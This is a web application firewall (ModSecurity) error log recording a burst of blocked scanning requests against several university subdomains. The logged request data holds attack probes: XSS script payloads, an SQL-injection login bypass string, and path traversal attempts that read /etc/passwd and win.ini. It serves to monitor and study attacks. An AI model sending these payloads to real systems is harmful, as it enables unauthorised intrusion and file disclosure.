[Tue Aug 29 11:42:50.393455 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAc92z4AAAAD"]
[Tue Aug 29 11:42:50.414448 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeX1B0AAAAK"]
[Tue Aug 29 11:42:50.488757 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:comment. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:comment: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/reviewInput.php"] [unique_id "ZO13SsCo-f0AAAeDirEAAAAx"]
[Tue Aug 29 11:42:51.360030 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdxUSoAAAAC"]
[Tue Aug 29 11:42:51.361290 2023] [:error] [pid 1923] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAeDirIAAAAx"]
[Tue Aug 29 11:42:51.366712 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAQSW2wAAAA0"]
[Tue Aug 29 11:42:51.368279 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdSZN8AAAAX"]
[Tue Aug 29 11:42:51.376638 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdb7mcAAAAb"]
[Tue Aug 29 11:42:51.376922 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdQ3iMAAAAV"]
[Tue Aug 29 11:42:51.379642 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAd-F0IAAAAt"]
[Tue Aug 29 11:42:51.384567 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAXNuXQAAAAg"]
[Tue Aug 29 11:42:51.385675 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAc920AAAAAD"]
[Tue Aug 29 11:42:51.398053 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAdOeS8AAAAS"]
[Tue Aug 29 11:42:51.410493 2023] [:error] [pid 1893] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:filename: /../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13S8Co-f0AAAdlvdQAAAAl"]
[Tue Aug 29 11:42:51.510269 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO13S8Co-f0AAAd4aywAAAAj"]
[Tue Aug 29 11:42:52.371492 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAbo-e0AAAAi"]
[Tue Aug 29 11:42:52.382462 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdQ3iUAAAAV"]
[Tue Aug 29 11:42:52.386517 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdb7mgAAAAb"]
[Tue Aug 29 11:42:52.386920 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAdftUMAAAAG"]
[Tue Aug 29 11:42:52.393255 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TMCo-f0AAAbo-e4AAAAi"]
[Tue Aug 29 11:42:53.360109 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAeoA-UAAAAT"]
[Tue Aug 29 11:42:53.367591 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeB1pcAAAAv"]
[Tue Aug 29 11:42:53.371247 2023] [:error] [pid 1912] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd4azAAAAAj"]
[Tue Aug 29 11:42:53.380454 2023] [:error] [pid 1919] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAd-F0UAAAAt"]
[Tue Aug 29 11:42:53.385430 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAdSZOEAAAAX"]
[Tue Aug 29 11:42:53.390969 2023] [:error] [pid 1921] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:task. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:task: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13TcCo-f0AAAeB1pgAAAAv"]
[Tue Aug 29 11:42:53.397595 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAd2324AAAAI"]
[Tue Aug 29 11:42:53.412136 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAAc920YAAAAD"]
[Tue Aug 29 11:42:53.416340 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TcCo-f0AAARpg3AAAAAU"]
[Tue Aug 29 11:42:53.420391 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAeX1CMAAAAK"]
[Tue Aug 29 11:42:53.420430 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TcCo-f0AAAc@caMAAAAL"]
[Tue Aug 29 11:42:54.376758 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAdOeTUAAAAS"]
[Tue Aug 29 11:42:54.385880 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:file_name: ../../../../../../../../../../../../c:/windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webui/"] [unique_id "ZO13TsCo-f0AAAc920cAAAAD"]
